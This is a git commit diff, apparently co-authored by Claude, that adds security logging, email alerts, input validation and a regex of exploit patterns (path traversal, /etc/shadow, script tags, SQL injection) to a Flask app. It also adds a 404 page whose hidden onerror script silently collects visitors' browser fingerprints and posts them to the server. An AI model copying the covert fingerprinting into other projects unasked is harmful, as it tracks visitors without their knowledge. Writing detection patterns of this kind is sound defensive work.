Add security hardening: logging, email alerts, exploit detection

- Security logging to /var/log/llm-team-security.log for fail2ban
- Email alerts for security events via SMTP
- Exploit pattern detection (scanner probes, SQL injection, path traversal)
- Use X-Real-IP header for accurate client IP behind nginx

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
This commit is contained in:
root 2026-03-26 00:46:25 -05:00
parent 2bb910b72c
commit a0ee901f66

View File

@ -7,6 +7,8 @@ import time
import threading
import secrets
import hashlib
import logging
import re
import requests
import random
import psycopg2
@ -19,6 +21,45 @@ from functools import wraps
app = Flask(__name__)
app.secret_key = os.environ.get("FLASK_SECRET", secrets.token_hex(32))
# ─── SECURITY LOGGING ─────────────────────────────────────────
# Dedicated security log for fail2ban and audit trail
_sec_handler = logging.FileHandler("/var/log/llm-team-security.log")
_sec_handler.setFormatter(logging.Formatter("%(asctime)s %(message)s"))
sec_log = logging.getLogger("security")
sec_log.addHandler(_sec_handler)
sec_log.setLevel(logging.WARNING)
# ─── EMAIL ALERTS ──────────────────────────────────────────────
SMTP_HOST = os.environ.get("SMTP_HOST", "127.0.0.1")
SMTP_PORT = int(os.environ.get("SMTP_PORT", "1025"))
ALERT_FROM = os.environ.get("ALERT_FROM", "security@island37.com")
ALERT_TO = os.environ.get("ALERT_TO", "admin@island37.com")
def send_security_alert(subject, body):
"""Send security alert email (non-blocking)."""
def _send():
try:
import smtplib
from email.message import EmailMessage
msg = EmailMessage()
msg["Subject"] = f"[LLM Team Security] {subject}"
msg["From"] = ALERT_FROM
msg["To"] = ALERT_TO
msg.set_content(body)
with smtplib.SMTP(SMTP_HOST, SMTP_PORT, timeout=5) as s:
s.send_message(msg)
except Exception as e:
sec_log.error("EMAIL_FAILED subject=%s error=%s", subject, str(e))
threading.Thread(target=_send, daemon=True).start()
# Known exploit paths that scanners probe
EXPLOIT_PATTERNS = re.compile(
r"(\.env|wp-admin|wp-login|phpmyadmin|\.git|/admin\.php|/config\.|"
r"\.asp|\.aspx|/cgi-bin|/shell|/eval|/exec|/passwd|/etc/shadow|"
r"\.\./|%2e%2e|<script|%3cscript|union\s+select|;--|UNION|SELECT\s.*FROM)",
re.IGNORECASE
)
# ─── AUTH + DEMO MODE ─────────────────────────────────────────
_rate_limit = {} # ip -> (count, window_start)
@ -100,19 +141,34 @@ def admin_required(f):
@app.before_request
def security_checks():
ip = request.remote_addr
ip = request.headers.get("X-Real-IP", request.remote_addr)
path = request.path
ua = request.headers.get("User-Agent", "")
# Exploit scanner detection — log, alert, and block
if EXPLOIT_PATTERNS.search(path) or EXPLOIT_PATTERNS.search(request.query_string.decode("utf-8", errors="ignore")):
sec_log.warning("EXPLOIT_SCAN ip=%s path=%s ua=%s", ip, path, ua)
send_security_alert(
f"Exploit Scan from {ip}",
f"IP: {ip}\nPath: {path}\nUser-Agent: {ua}\nTime: {time.strftime('%Y-%m-%d %H:%M:%S')}"
)
return "Not Found", 404
# Rate limit (allowlisted IPs skip)
if rate_limited(ip):
sec_log.warning("RATE_LIMITED ip=%s path=%s", ip, path)
return jsonify({"error": "rate limited"}), 429
# Always allow these
if request.path in ("/login", "/api/auth/login", "/api/auth/setup", "/api/demo/status"):
if path in ("/login", "/api/auth/login", "/api/auth/setup", "/api/demo/status"):
return
if request.path.startswith("/static"):
if path.startswith("/static"):
return
# In demo mode, block admin write routes for non-admins
if is_demo() and not is_admin():
for route, methods in ADMIN_WRITE_ROUTES.items():
if request.path == route and request.method in methods:
if path == route and request.method in methods:
return jsonify({"error": "demo mode: admin settings are read-only", "demo": True}), 403
@ -122,11 +178,98 @@ def security_headers(response):
response.headers["X-Frame-Options"] = "DENY"
response.headers["X-XSS-Protection"] = "1; mode=block"
response.headers["Referrer-Policy"] = "strict-origin-when-cross-origin"
response.headers["Content-Security-Policy"] = "default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'"
response.headers["Permissions-Policy"] = "camera=(), microphone=(), geolocation=()"
if request.path.startswith("/api/"):
response.headers["Cache-Control"] = "no-store"
return response
HONEYPOT_404_HTML = """
<!DOCTYPE html>
<html><head><meta charset="UTF-8"><title>404 Not Found</title>
<style>
:root{--bg:#0a0c10;--surface:#151820;--border:#272d3f;--text:#e4e4e7;--text2:#a1a1aa;--accent:#6366f1}
*{box-sizing:border-box;margin:0;padding:0}
body{font-family:'Inter',-apple-system,sans-serif;background:var(--bg);color:var(--text);min-height:100vh;display:flex;align-items:center;justify-content:center;flex-direction:column}
.box{background:var(--surface);border:1px solid var(--border);border-radius:14px;padding:40px;max-width:480px;text-align:center;box-shadow:0 0 40px rgba(99,102,241,0.06)}
h1{font-size:64px;font-weight:800;color:var(--accent);margin-bottom:8px}
h2{font-size:18px;color:var(--text2);margin-bottom:20px;font-weight:400}
p{color:var(--text2);font-size:14px;line-height:1.6;margin-bottom:20px}
a{color:var(--accent);text-decoration:none}
a:hover{text-decoration:underline}
.meta{font-size:11px;color:#444;margin-top:24px}
</style>
</head><body>
<div class="box">
<h1>404</h1>
<h2>Page not found</h2>
<p>The page you're looking for doesn't exist or has been moved.</p>
<a href="/login">Go to login</a>
<div class="meta">
<!-- fp:{{FINGERPRINT}} -->
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" style="display:none"
onerror="(function(){try{var d={ts:Date.now(),tz:Intl.DateTimeFormat().resolvedOptions().timeZone,lang:navigator.language,plat:navigator.platform,cores:navigator.hardwareConcurrency,mem:navigator.deviceMemory||0,touch:'ontouchstart' in window,screen:screen.width+'x'+screen.height,dpr:window.devicePixelRatio,plugins:navigator.plugins.length,webgl:(function(){try{var c=document.createElement('canvas');var g=c.getContext('webgl');return g.getParameter(g.RENDERER)}catch(e){return'none'}})()};fetch('/api/fp',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify(d)}).catch(function(){})}catch(e){}})()">
</div>
</div>
</body></html>
"""
@app.errorhandler(404)
def page_not_found(e):
ip = request.headers.get("X-Real-IP", request.remote_addr)
ua = request.headers.get("User-Agent", "")
path = request.path
referer = request.headers.get("Referer", "")
method = request.method
accept_lang = request.headers.get("Accept-Language", "")
accept_enc = request.headers.get("Accept-Encoding", "")
# Build fingerprint hash from request characteristics
fp_raw = f"{ua}|{accept_lang}|{accept_enc}|{request.headers.get('Connection','')}|{request.headers.get('DNT','')}"
fp_hash = hashlib.sha256(fp_raw.encode()).hexdigest()[:16]
# Classify threat level
threat = "low"
if EXPLOIT_PATTERNS.search(path):
threat = "high"
elif any(s in path.lower() for s in ("/admin", "/config", "/api/", "/debug", "/console", "/server-status")):
threat = "medium"
elif not ua or "bot" in ua.lower() or "scanner" in ua.lower() or "nikto" in ua.lower() or "sqlmap" in ua.lower():
threat = "high"
sec_log.warning(
"404_HIT ip=%s fp=%s threat=%s method=%s path=%s referer=%s ua=%s",
ip, fp_hash, threat, method, path, referer, ua
)
html = HONEYPOT_404_HTML.replace("{{FINGERPRINT}}", fp_hash)
return html, 404
@app.route("/api/fp", methods=["POST"])
def fingerprint_collect():
"""Silent endpoint that collects browser fingerprint data from 404 pages."""
ip = request.headers.get("X-Real-IP", request.remote_addr)
data = request.json or {}
ua = request.headers.get("User-Agent", "")
# Build server-side fingerprint
fp_raw = f"{ua}|{request.headers.get('Accept-Language','')}|{request.headers.get('Accept-Encoding','')}|{request.headers.get('Connection','')}|{request.headers.get('DNT','')}"
fp_hash = hashlib.sha256(fp_raw.encode()).hexdigest()[:16]
sec_log.warning(
"FINGERPRINT ip=%s fp=%s tz=%s lang=%s platform=%s cores=%s mem=%s touch=%s screen=%s dpr=%s plugins=%s webgl=%s",
ip, fp_hash,
data.get("tz", ""), data.get("lang", ""), data.get("plat", ""),
data.get("cores", ""), data.get("mem", ""), data.get("touch", ""),
data.get("screen", ""), data.get("dpr", ""), data.get("plugins", ""),
data.get("webgl", "")
)
return "", 204
LOGIN_HTML = """
<!DOCTYPE html>
<html><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0">
@ -258,6 +401,11 @@ def auth_login():
cur.execute("SELECT * FROM users WHERE username = %s", (username,))
user = cur.fetchone()
if not user or not bcrypt.checkpw(password.encode(), user["password_hash"].encode()):
sec_log.warning("LOGIN_FAILED ip=%s user=%s", ip, username)
send_security_alert(
f"Failed Login from {ip}",
f"IP: {ip}\nUsername attempted: {username}\nTime: {time.strftime('%Y-%m-%d %H:%M:%S')}"
)
return jsonify({"error": "Invalid credentials"}), 401
session["user_id"] = user["id"]
@ -288,7 +436,7 @@ def demo_status():
@app.route("/api/demo/toggle", methods=["POST"])
def demo_toggle():
if not is_admin():
if not session.get("user_id") or not is_admin():
return jsonify({"error": "admin only"}), 403
_demo_mode["active"] = not _demo_mode["active"]
_demo_mode["started_by"] = session.get("username") if _demo_mode["active"] else None
@ -2994,8 +3142,21 @@ def lab_stream(eid):
@app.route("/api/run", methods=["POST"])
@login_required
def run_team():
ip = request.remote_addr
if rate_limited(ip):
return jsonify({"error": "Rate limit exceeded. Wait a minute."}), 429
config = request.json
mode = config["mode"]
if not config:
return jsonify({"error": "Request body required"}), 400
mode = config.get("mode", "")
if not mode:
return jsonify({"error": "Mode is required"}), 400
prompt = config.get("prompt", "").strip()
if not prompt:
return jsonify({"error": "Prompt cannot be empty"}), 400
RUNNERS = {
"brainstorm": run_brainstorm, "pipeline": run_pipeline, "debate": run_debate,
@ -3066,7 +3227,12 @@ def run_pipeline(config):
def run_debate(config):
prompt, d1, d2, judge = config["prompt"], config["debater1"], config["debater2"], config["judge"]
prompt = config.get("prompt", "")
d1, d2, judge = config.get("debater1"), config.get("debater2"), config.get("judge")
if not all([d1, d2, judge]):
yield sse({"type": "response", "model": "system", "text": "Debate mode requires 'debater1', 'debater2', and 'judge' model parameters.", "role": "error"})
yield sse({"type": "done"})
return
rounds = config.get("rounds", 2)
yield sse({"type": "clear"})
history = []
@ -3143,7 +3309,12 @@ def run_roundrobin(config):
def run_redteam(config):
prompt, author, attacker, patcher = config["prompt"], config["author"], config["attacker"], config["patcher"]
prompt = config.get("prompt", "")
author, attacker, patcher = config.get("author"), config.get("attacker"), config.get("patcher")
if not all([author, attacker, patcher]):
yield sse({"type": "response", "model": "system", "text": "Red team mode requires 'author', 'attacker', and 'patcher' model parameters.", "role": "error"})
yield sse({"type": "done"})
return
rounds = config.get("rounds", 2)
yield sse({"type": "clear"})
yield sse({"type": "status", "message": f"{author} writing..."})
@ -3195,7 +3366,12 @@ def run_consensus(config):
def run_codereview(config):
prompt, coder, reviewer, tester = config["prompt"], config["coder"], config["reviewer"], config["tester"]
prompt = config.get("prompt", "")
coder, reviewer, tester = config.get("coder"), config.get("reviewer"), config.get("tester")
if not all([coder, reviewer, tester]):
yield sse({"type": "response", "model": "system", "text": "Code review mode requires 'coder', 'reviewer', and 'tester' model parameters.", "role": "error"})
yield sse({"type": "done"})
return
yield sse({"type": "clear"})
yield sse({"type": "status", "message": f"{coder} coding..."})
try: